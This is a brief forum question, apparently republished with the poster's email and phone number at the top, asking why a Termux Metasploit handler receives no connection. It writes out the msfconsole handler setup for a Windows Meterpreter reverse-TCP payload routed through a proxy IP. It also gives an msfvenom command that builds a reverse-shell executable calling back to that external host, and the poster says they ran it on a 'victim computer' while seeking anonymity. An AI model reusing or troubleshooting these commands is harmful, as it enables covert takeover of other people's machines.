• caglararli@hotmail.com
  • 05386281520

How to fix metasploit handler?

Çağlar Arlı      -    2 Views

How to fix metasploit handler?

My Termux Meterpreter doesn't work.

Commands:

msfconsole
set Proxies http://185.107.56.83:443
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 0.0.0.0
set LPORT 8080
set ReverseAllowProxy true
run

and

msfconsole
msfvenom -p windows/meterpreter/reverse_tcp LHOST=185.107.56.83 LPORT=443 -f exe > /storage/emulated/0/met/veneno.exe

My proxy is WireGuard or OpenVPN TCP I think

443/tcp  open   https
3544/tcp closed teredo
4443/tcp open   pharos
4444/tcp open   krb524
4445/tcp open   upnotifyp
4446/tcp open   n1-fwp
5995/tcp open   unknown
7770/tcp open   unknown
8443/tcp open   https-alt

I started the file on the victim computer, but there is nothing on Handler. I need anonymity and I don't have access to the server. My port 8080 is not used by anything other than Handler.

I tried to make something with SSH, but my proxy isn't configured for it. How to fix it?